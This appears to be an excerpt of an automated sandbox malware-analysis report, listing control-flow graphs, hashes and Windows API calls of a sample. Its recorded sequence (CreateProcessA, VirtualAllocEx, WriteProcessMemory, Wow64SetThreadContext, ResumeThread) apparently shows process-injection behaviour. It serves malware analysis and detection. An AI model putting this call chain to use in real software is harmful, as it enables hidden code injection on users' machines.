                                                                                                                                              • Instruction Fuzzy Hash: D6A2C274A012298FDBA4DF69C894BDDBBB1BF48300F1485EA944DAB261DB309EC5CF51

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 568 1453028-1453054 569 1453056 568->569 570 145305b-14530a3 568->570 569->570 571 14530be-14530c2 570->571 572 14530a5-14530b7 571->572 573 14530c4-14530e6 571->573 572->571 574 14530b9 572->574 576 1453205-145321e 573->576 577 14530ec-1453124 573->577 574->571 581 1453224-1453250 576->581 582 1453319-1453335 576->582 578 1453126 577->578 579 145312b-1453164 577->579 578->579 588 1453166 579->588 589 145316b-1453179 579->589 584 1453257-145327e 581->584 585 1453252 581->585 590 1453585-145358b 582->590 598 1453285-1453293 584->598 599 1453280 584->599 585->584 588->589 592 1453180-14531b9 589->592 593 145317b 589->593 594 1453591-145359b 590->594 595 145333a-145335d 590->595 610 14531c0-14531ce 592->610 611 14531bb 592->611 593->592 596 145359d-14535aa 594->596 604 1453364-145336f 595->604 605 145335f 595->605 602 1453295 598->602 603 145329a-14532cd 598->603 599->598 602->603 619 14532d4-14532e2 603->619 620 14532cf 603->620 607 1453376-145337b 604->607 608 1453371 604->608 605->604 612 1453382-14533ba 607->612 613 145337d 607->613 608->607 614 14531d5-14531ff 610->614 615 14531d0 610->615 611->610 627 14533c1-14533ed 612->627 628 14533bc 612->628 613->612 614->576 615->614 622 14532e4 619->622 623 14532e9-1453313 619->623 620->619 622->623 623->582 632 14533f3-1453431 627->632 628->627 635 1453433 632->635 636 1453438-1453464 632->636 635->636 638 1453466 636->638 639 145346b-1453476 636->639 638->639 640 145347d-1453482 639->640 641 1453478 639->641 642 1453484 640->642 643 1453489-14534e4 call 1452f88 640->643 641->640 642->643 649 145357a-145357e 643->649 650 14534ea-145350d 643->650 649->590 651 1453580 649->651 653 1453514-145351f 650->653 654 145350f 650->654 651->590 655 1453526-145352b 653->655 656 1453521 653->656 654->653 657 1453532-145356a 655->657 658 145352d 655->658 656->655 662 1453571-1453578 657->662 663 145356c 657->663 658->657 662->596 663->662
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.1841708304.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_1450000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ff924c837190fc601b225e806055a80933eb01a59b87a307db4590be7a5aaec1
                                                                                                                                              • Instruction ID: 92e40fa35a781db4ffb6488ac5e0c481f5020e51ede30c1a5e7999de71b440eb
                                                                                                                                              • Opcode Fuzzy Hash: ff924c837190fc601b225e806055a80933eb01a59b87a307db4590be7a5aaec1
                                                                                                                                              • Instruction Fuzzy Hash: E8F14E74E002198FDB54DFA8C890B9DBBB6BF88314F54C06AE908A7352DB349E85CF51

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 664 1450848-1450868 665 145086f-14508ab 664->665 666 145086a 664->666 668 14508d7-14508dd 665->668 666->665 669 14508e6-14508e7 668->669 670 14508df 668->670 675 14508ad-14508af 669->675 670->669 671 1450965-1450967 670->671 672 14509e5 670->672 673 14509c5-14509e3 670->673 674 1450986-14509b5 670->674 670->675 676 1450b2d-1450b2e 670->676 677 14508c8-14508d5 670->677 678 1450b0b call 1451d80 670->678 679 145094a-1450958 670->679 680 14508f3 call 1450c9a 670->680 681 1450ad2-1450af7 670->681 682 1450a1b-1450aa9 call 1451e89 670->682 683 1450afa-1450afb 670->683 721 145096d call 14510e5 671->721 722 145096d call 1451255 671->722 723 145096d call 1451274 671->723 724 145096d call 1451200 671->724 725 145096d call 1451210 671->725 726 145096d call 145110d 671->726 727 145096d call 145111d 671->727 728 145096d call 14510fd 671->728 729 145096d call 1451289 671->729 730 145096d call 1451298 671->730 691 14509ed-14509fd 672->691 673->672 698 1450a02-1450a08 673->698 707 1450b00-1450b06 674->707 708 14509bb-14509c3 674->708 684 1450b8b-1450b91 675->684 685 1450b2f-1450b31 676->685 677->669 688 1450b11-1450b28 678->688 696 1450905 679->696 697 145095a-1450960 679->697 693 14508f9-1450903 680->693 681->683 718 1450aaf-1450ac3 682->718 683->682 685->684 688->698 691->681 692 1450973-1450984 692->698 699 145090c-1450917 693->699 696->699 697->668 705 1450a11-1450a19 698->705 706 1450a0a 698->706 702 14508b4 699->702 703 1450919-1450935 699->703 711 14508be-14508c6 702->711 714 1450937-1450948 703->714 715 14508e9-14508f1 703->715 705->698 706->672 706->673 706->674 706->676 706->678 706->681 706->682 706->683 706->705 707->698 708->698 711->668 714->668 714->679 715->668 718->685 719 1450ac5-1450acd 718->719 719->698 721->692 722->692 723->692 724->692 725->692 726->692 727->692 728->692 729->692 730->692
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.1841708304.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_1450000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: eb184520e1a418582964907ba211b6a79aeef247b19e283991d41a32d229e0e3
                                                                                                                                              • Instruction ID: 4b4f05d66d954fd3f636555433fe2aae898424a6f43ec10599d99d7039a0a62c
                                                                                                                                              • Opcode Fuzzy Hash: eb184520e1a418582964907ba211b6a79aeef247b19e283991d41a32d229e0e3
                                                                                                                                              • Instruction Fuzzy Hash: 549115B8D05218CFDB54DFA9D884BADBBB1BF49300F10806AE809B7366EB355985CF00
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.1841708304.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_1450000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: fc0823743cbcc4e6ef124fc6715b0407019c523bc1de6b65293f7a3fc0e048f2
                                                                                                                                              • Instruction ID: c08561c33387e12734e73840e5e04f3c5be242995e520bd1bc605b5289f768c0
                                                                                                                                              • Opcode Fuzzy Hash: fc0823743cbcc4e6ef124fc6715b0407019c523bc1de6b65293f7a3fc0e048f2
                                                                                                                                              • Instruction Fuzzy Hash: E58123B8D05218CFDB54DFA9D884BADBBB1FF49304F10846AE849A7366EB345985CF00
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.1841708304.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_1450000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 6c3c6d5a8071fd5a5694eb164c76125c6cffd38e0f5e89decf9a6df341541530
                                                                                                                                              • Instruction ID: f4011a7f1781b1ee0e1e925c9c9dd9a7e88b6844b9bf06790855ce3d6e362fbc
                                                                                                                                              • Opcode Fuzzy Hash: 6c3c6d5a8071fd5a5694eb164c76125c6cffd38e0f5e89decf9a6df341541530
                                                                                                                                              • Instruction Fuzzy Hash: 408103B8D01218CFDB54DFA9D984BADBBB1FF49300F10856AE849A7366EB355985CF00

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 40 1455862-1455c40 45 1455c57-1455c9f Wow64SetThreadContext 40->45 46 1455c42-1455c54 40->46 48 1455ca1-1455ca7 45->48 49 1455ca8-1455cf4 45->49 46->45 48->49
                                                                                                                                              APIs
                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 01455C8F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.1841708304.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_1450000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 983334009-0
                                                                                                                                              • Opcode ID: eb23bc18904d4d86646a55ccd0d3bc841127fbb6e737c316983f0f9ad66fb053
                                                                                                                                              • Instruction ID: 07ac970ab6652057d55360f50a4b26f7c2039fd253b35d882aad6563ca7508a8
                                                                                                                                              • Opcode Fuzzy Hash: eb23bc18904d4d86646a55ccd0d3bc841127fbb6e737c316983f0f9ad66fb053
                                                                                                                                              • Instruction Fuzzy Hash: AC515BB1D093989FCB02CFA8D8906DDBFF0AF5A310F1580AAD444AB252D3785989CF65

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 54 1455344-14553e9 56 1455432-145545a 54->56 57 14553eb-1455402 54->57 60 14554a0-14554f6 56->60 61 145545c-1455470 56->61 57->56 62 1455404-1455409 57->62 71 145553c-145562a CreateProcessA 60->71 72 14554f8-145550c 60->72 61->60 69 1455472-1455477 61->69 63 145542c-145542f 62->63 64 145540b-1455415 62->64 63->56 66 1455417 64->66 67 1455419-1455428 64->67 66->67 67->67 70 145542a 67->70 73 1455479-1455483 69->73 74 145549a-145549d 69->74 70->63 90 1455633-1455718 71->90 91 145562c-1455632 71->91 72->71 79 145550e-1455513 72->79 76 1455485 73->76 77 1455487-1455496 73->77 74->60 76->77 77->77 80 1455498 77->80 81 1455515-145551f 79->81 82 1455536-1455539 79->82 80->74 84 1455521 81->84 85 1455523-1455532 81->85 82->71 84->85 85->85 86 1455534 85->86 86->82 103 1455728-145572c 90->103 104 145571a-145571e 90->104 91->90 106 145573c-1455740 103->106 107 145572e-1455732 103->107 104->103 105 1455720 104->105 105->103 108 1455750-1455754 106->108 109 1455742-1455746 106->109 107->106 110 1455734 107->110 112 1455756-145577f 108->112 113 145578a-1455795 108->113 109->108 111 1455748 109->111 110->106 111->108 112->113 117 1455796 113->117 117->117
                                                                                                                                              APIs
                                                                                                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01455617
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.1841708304.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_1450000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 963392458-0
                                                                                                                                              • Opcode ID: 833c101227653436fde7406de914905ce252349aaf1eeab495018a2c28f99011
                                                                                                                                              • Instruction ID: c5f12f552d3e56e727d95ba148039fcc403cc146e3132cbe01b78822303fcb1a
                                                                                                                                              • Opcode Fuzzy Hash: 833c101227653436fde7406de914905ce252349aaf1eeab495018a2c28f99011
                                                                                                                                              • Instruction Fuzzy Hash: AAC12771D00219CFDB64CFA8C8407EEBBB1BF49314F0495AAD849BB250DB749A85CF95

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 118 1455350-14553e9 120 1455432-145545a 118->120 121 14553eb-1455402 118->121 124 14554a0-14554f6 120->124 125 145545c-1455470 120->125 121->120 126 1455404-1455409 121->126 135 145553c-145562a CreateProcessA 124->135 136 14554f8-145550c 124->136 125->124 133 1455472-1455477 125->133 127 145542c-145542f 126->127 128 145540b-1455415 126->128 127->120 130 1455417 128->130 131 1455419-1455428 128->131 130->131 131->131 134 145542a 131->134 137 1455479-1455483 133->137 138 145549a-145549d 133->138 134->127 154 1455633-1455718 135->154 155 145562c-1455632 135->155 136->135 143 145550e-1455513 136->143 140 1455485 137->140 141 1455487-1455496 137->141 138->124 140->141 141->141 144 1455498 141->144 145 1455515-145551f 143->145 146 1455536-1455539 143->146 144->138 148 1455521 145->148 149 1455523-1455532 145->149 146->135 148->149 149->149 150 1455534 149->150 150->146 167 1455728-145572c 154->167 168 145571a-145571e 154->168 155->154 170 145573c-1455740 167->170 171 145572e-1455732 167->171 168->167 169 1455720 168->169 169->167 172 1455750-1455754 170->172 173 1455742-1455746 170->173 171->170 174 1455734 171->174 176 1455756-145577f 172->176 177 145578a-1455795 172->177 173->172 175 1455748 173->175 174->170 175->172 176->177 181 1455796 177->181 181->181
                                                                                                                                              APIs
                                                                                                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01455617
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.1841708304.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_1450000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 963392458-0
                                                                                                                                              • Opcode ID: ad95ba67345a0b53bfaf8346a3dede4eab14d1f79ae059115e241a713cc8d6a3
                                                                                                                                              • Instruction ID: 495fffb9beb15de767d076220430fbbe55d0c37c95988d523bb2232a94bb7738
                                                                                                                                              • Opcode Fuzzy Hash: ad95ba67345a0b53bfaf8346a3dede4eab14d1f79ae059115e241a713cc8d6a3
                                                                                                                                              • Instruction Fuzzy Hash: 26C11671D0021D8FDB64CFA8C840BEEBBB1BF49314F0495AAD849BB250DB749A85CF95

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 182 1455e30-1455ea3 184 1455ea5-1455eb7 182->184 185 1455eba-1455f1b WriteProcessMemory 182->185 184->185 187 1455f24-1455f76 185->187 188 1455f1d-1455f23 185->188 188->187
                                                                                                                                              APIs
                                                                                                                                              • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 01455F0B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.1841708304.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_1450000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3559483778-0
                                                                                                                                              • Opcode ID: 103862a9e181220c2a52945d91adfbeba943b42b9ece37513401a14492120c47
                                                                                                                                              • Instruction ID: b61a39867857b3b687ae38757ab03545fa090bb370e71650f5c1a6580396f8ca
                                                                                                                                              • Opcode Fuzzy Hash: 103862a9e181220c2a52945d91adfbeba943b42b9ece37513401a14492120c47
                                                                                                                                              • Instruction Fuzzy Hash: 6841ABB5D012589FCF00CFA9D984AEEFBF1BB49310F14902AE815BB210D379AA45CF54

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 193 1455e38-1455ea3 195 1455ea5-1455eb7 193->195 196 1455eba-1455f1b WriteProcessMemory 193->196 195->196 198 1455f24-1455f76 196->198 199 1455f1d-1455f23 196->199 199->198
                                                                                                                                              APIs
                                                                                                                                              • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 01455F0B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.1841708304.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_1450000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3559483778-0
                                                                                                                                              • Opcode ID: 4ae526324dacae82258be2712791180da75feb7304014ef9479256d442406414
                                                                                                                                              • Instruction ID: 164b95a633ef6c21b2c4a3abdb7d4d2064f9cb5b3c819977e4f6ef77e135184c
                                                                                                                                              • Opcode Fuzzy Hash: 4ae526324dacae82258be2712791180da75feb7304014ef9479256d442406414
                                                                                                                                              • Instruction Fuzzy Hash: B6419AB5D012589FCF00CFA9D984AEEFBF1BB49310F14902AE819BB210D775AA45CF54

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 204 1456088-145614a VirtualAllocEx 207 1456153-145619d 204->207 208 145614c-1456152 204->208 208->207
                                                                                                                                              APIs
                                                                                                                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0145613A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.1841708304.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_1450000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                              • Opcode ID: 5d2937cc2f05ad123b70ca41953dc0a9ef84b5872c4014bb1cd26f70ec0f46dd
                                                                                                                                              • Instruction ID: f07c71bb48c19abbfca04b0bf8ca0b9f0671dfc6247cac57c4e8dfc3f190579b
                                                                                                                                              • Opcode Fuzzy Hash: 5d2937cc2f05ad123b70ca41953dc0a9ef84b5872c4014bb1cd26f70ec0f46dd
                                                                                                                                              • Instruction Fuzzy Hash: 653198B9D042589FCF14CFA9D980ADEFBB1FB59310F10942AE815B7210D735A946CF54

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 213 1456090-145614a VirtualAllocEx 216 1456153-145619d 213->216 217 145614c-1456152 213->217 217->216
                                                                                                                                              APIs
                                                                                                                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0145613A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.1841708304.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_1450000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                              • Opcode ID: 0f1cfa95cfad6416d1b43f4540028d8386002757d2911e8b4943475724b48092
                                                                                                                                              • Instruction ID: 620500ebf343861aa0106fa5fa4959233ba21c8da96f36606627b243e6ace505
                                                                                                                                              • Opcode Fuzzy Hash: 0f1cfa95cfad6416d1b43f4540028d8386002757d2911e8b4943475724b48092
                                                                                                                                              • Instruction Fuzzy Hash: C53187B9D042589FCF10CFA9D980AEEFBB5BB49310F10942AE815B7310D735A946CF58

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 222 1455be0-1455c40 224 1455c57-1455c9f Wow64SetThreadContext 222->224 225 1455c42-1455c54 222->225 227 1455ca1-1455ca7 224->227 228 1455ca8-1455cf4 224->228 225->224 227->228
                                                                                                                                              APIs
                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 01455C8F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.1841708304.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_1450000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 983334009-0
                                                                                                                                              • Opcode ID: c969a6edfbf0b132aa86aa547c9bc330f2024ba2bc0b5d71083634a26fa165e6
                                                                                                                                              • Instruction ID: a5c1907eb77fd8bbf21eae10b431d50c859ed02d56682d710f14cc9d709110c7
                                                                                                                                              • Opcode Fuzzy Hash: c969a6edfbf0b132aa86aa547c9bc330f2024ba2bc0b5d71083634a26fa165e6
                                                                                                                                              • Instruction Fuzzy Hash: CF31BBB4D002589FCB14CFA9D984AEEFBF1BB49314F14802AE418BB250C738A985CF94

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 233 14561a8-145623e ResumeThread 236 1456247-1456289 233->236 237 1456240-1456246 233->237 237->236
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.1841708304.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_1450000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ResumeThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 947044025-0
                                                                                                                                              • Opcode ID: ce6282b26343edced4cac0a1624ce5e8a2607ff21aa6ef8b7c9429fd518c6141
                                                                                                                                              • Instruction ID: dd1d984359d64a1bf920d62959668f3bf0b03614ab655aee8ff65b63f4a0e854
                                                                                                                                              • Opcode Fuzzy Hash: ce6282b26343edced4cac0a1624ce5e8a2607ff21aa6ef8b7c9429fd518c6141
                                                                                                                                              • Instruction Fuzzy Hash: FE31C9B4D012189FCB14CFA9D980AEEFBB1BB48314F24942AE819B7310C735A841CFA4

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 242 14561b0-145623e ResumeThread 245 1456247-1456289 242->245 246 1456240-1456246 242->246 246->245
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.1841708304.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_1450000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ResumeThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 947044025-0
                                                                                                                                              • Opcode ID: 31ec1d1a55fded6f4c42bb8f130809333c4a58cb2376be8754ebfad2dab4744b
                                                                                                                                              • Instruction ID: f5a98d8c5ee6aae0776c891caf3908c40f741818fc84554873060b8eff921c21
                                                                                                                                              • Opcode Fuzzy Hash: 31ec1d1a55fded6f4c42bb8f130809333c4a58cb2376be8754ebfad2dab4744b
                                                                                                                                              • Instruction Fuzzy Hash: 2431AAB4D012189FCF14DFA9D984ADEFBB5BB49310F10942AE815B7310C735A941CFA8

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:1%
                                                                                                                                              Dynamic/Decrypted Code Coverage:5.7%
                                                                                                                                              Signature Coverage:5.7%
                                                                                                                                              Total number of Nodes:106
                                                                                                                                              Total number of Limit Nodes:10
                                                                                                                                              execution_graph 77517 42b503 77518 42b51d 77517->77518 77521 19c2df0 LdrInitializeThunk 77518->77521 77519 42b545 77521->77519 77522 42f2a3 77523 42f213 77522->77523 77524 42f270 77523->77524 77528 42e093 77523->77528 77526 42f24d 77531 42dfb3 77526->77531 77534 42c233 77528->77534 77530 42e0ab 77530->77526 77537 42c283 77531->77537 77533 42dfc9 77533->77524 77535 42c24d 77534->77535 77536 42c25e RtlAllocateHeap 77535->77536 77536->77530 77538 42c2a0 77537->77538 77539 42c2b1 RtlFreeHeap 77538->77539 77539->77533 77540 4246a3 77545 4246bc 77540->77545 77541 424749 77542 424704 77543 42dfb3 RtlFreeHeap 77542->77543 77544 424714 77543->77544 77545->77541 77545->77542 77546 424744 77545->77546 77547 42dfb3 RtlFreeHeap 77546->77547 77547->77541 77568 42f173 77569 42f183 77568->77569 77570 42f189 77568->77570 77571 42e093 RtlAllocateHeap 77570->77571 77572 42f1af 77571->77572 77578 424313 77579 42432f 77578->77579 77580 424357 77579->77580 77581 42436b 77579->77581 77582 42bf13 NtClose 77580->77582 77583 42bf13 NtClose 77581->77583 77584 424360 77582->77584 77585 424374 77583->77585 77588 42e0d3 RtlAllocateHeap 77585->77588 77587 42437f 77588->77587 77548 4136a3 77552 4136c0 77548->77552 77550 41371c 77551 413726 77552->77551 77553 41ada3 RtlFreeHeap LdrInitializeThunk 77552->77553 77553->77550 77554 423ea4 77555 423ec5 77554->77555 77556 423ee3 77555->77556 77557 423ef8 77555->77557 77559 42bf13 NtClose 77556->77559 77565 42bf13 77557->77565 77560 423eec 77559->77560 77561 423f38 77562 423f01 77562->77561 77563 42dfb3 RtlFreeHeap 77562->77563 77564 423f2c 77563->77564 77566 42bf30 77565->77566 77567 42bf41 NtClose 77566->77567 77567->77562 77589 40197c 77590 401981 77589->77590 77593 42f643 77590->77593 77596 42db63 77593->77596 77597 42db89 77596->77597 77606 407293 77597->77606 77599 42db9f 77605 401a0c 77599->77605 77609 41aa93 77599->77609 77601 42dbbe 77602 42c2d3 ExitProcess 77601->77602 77603 42dbd3 77601->77603 77602->77603 77620 42c2d3 77603->77620 77623 415e63 77606->77623 77608 4072a0 77608->77599 77610 41aabf 77609->77610 77641 41a983 77610->77641 77613 41ab04 77615 41ab20 77613->77615 77618 42bf13 NtClose 77613->77618 77614 41aaec 77616 41aaf7 77614->77616 77617 42bf13 NtClose 77614->77617 77615->77601 77616->77601 77617->77616 77619 41ab16 77618->77619 77619->77601 77621 42c2ed 77620->77621 77622 42c2fe ExitProcess 77621->77622 77622->77605 77624 415e80 77623->77624 77626 415e96 77624->77626 77627 42c963 77624->77627 77626->77608 77629 42c97d 77627->77629 77628 42c9ac 77628->77626 77629->77628 77634 42b553 77629->77634 77632 42dfb3 RtlFreeHeap 77633 42ca22 77632->77633 77633->77626 77635 42b570 77634->77635 77638 19c2c0a 77635->77638 77636 42b59c 77636->77632 77639 19c2c1f LdrInitializeThunk 77638->77639 77640 19c2c11 77638->77640 77639->77636 77640->77636 77642 41a99d 77641->77642 77646 41aa79 77641->77646 77647 42b5f3 77642->77647 77645 42bf13 NtClose 77645->77646 77646->77613 77646->77614 77648 42b610 77647->77648 77651 19c35c0 LdrInitializeThunk 77648->77651 77649 41aa6d 77649->77645 77651->77649 77652 19c2b60 LdrInitializeThunk

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 5 42bf13-42bf4f call 4044a3 call 42d153 NtClose
                                                                                                                                              APIs
                                                                                                                                              • NtClose.NTDLL(tCB,?,00000000,?,?,00424374,?,0000B252), ref: 0042BF4A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1950225873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_x.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Close
                                                                                                                                              • String ID: tCB
                                                                                                                                              • API String ID: 3535843008-4013893092
                                                                                                                                              • Opcode ID: 6831eff854b14dac166e894cf006320f2323fa42a408d705fb4078735ec24ccc
                                                                                                                                              • Instruction ID: f5e6ebafdc0ebfe4b0213ccca7ee9e312587966a4b08d1025d04be40c9a06f07
                                                                                                                                              • Opcode Fuzzy Hash: 6831eff854b14dac166e894cf006320f2323fa42a408d705fb4078735ec24ccc
                                                                                                                                              • Instruction Fuzzy Hash: 7BE04F713012147BD610EB5ADC01FA7775CDFC5754F108119FA4867281D675791087A5

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 33 417193-4171af 34 4171b7-4171bc 33->34 35 4171b2 call 42ecb3 33->35 36 4171c2-4171d0 call 42f2b3 34->36 37 4171be-4171c1 34->37 35->34 41 4171e0-4171f1 call 42d633 36->41 42 4171d2-4171dd call 42f553 36->42 47 4171f3-417207 LdrLoadDll 41->47 48 41720a-41720d 41->48 42->41 47->48
                                                                                                                                              APIs
                                                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417205
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1950225873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_x.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Load
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2234796835-0
                                                                                                                                              • Opcode ID: a69e7a07e3bc8e40f5efbddf74c7caad666b45ad786fb07d6a8e72fe321118df
                                                                                                                                              • Instruction ID: 559387bb727b7c6aff5d3b72a4b901e91eba14c75de62de551442f05a391ca76
                                                                                                                                              • Opcode Fuzzy Hash: a69e7a07e3bc8e40f5efbddf74c7caad666b45ad786fb07d6a8e72fe321118df
